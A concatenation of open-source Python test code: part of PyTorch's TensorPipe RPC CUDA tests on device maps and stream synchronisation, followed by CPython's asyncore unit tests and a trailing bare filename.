def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward functions
# calls RRef.to_here(), hence needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
# worker2 will get the out RRef and call to_here() and hence, needs
# to configure devcie map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
import errno
from test import support
from test.support import TESTFN, run_unittest, unlink
from io import BytesIO
from io import StringIO
HOST = support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEqual(lines, expected)
def test_issue_8594(self):
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
try:
d.foo
except AttributeError as err:
self.assertTrue('dispatcher instance' in str(err))
else:
self.fail("exception not raised")
# test cheap inheritance with the underlying socket
self.assertEqual(d.family, socket.AF_INET)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue("unknown error" in err.lower())
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = support.bind_port(self.sock)
cap = BytesIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
if hasattr(asyncore, 'file_wrapper'):
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
open(TESTFN, 'wb').write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(open(TESTFN, 'rb').read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
' asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll]
if hasattr(asyncore, 'file_wrapper'):
tests.append(FileWrapperTest)
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
vm_util_test.py
|
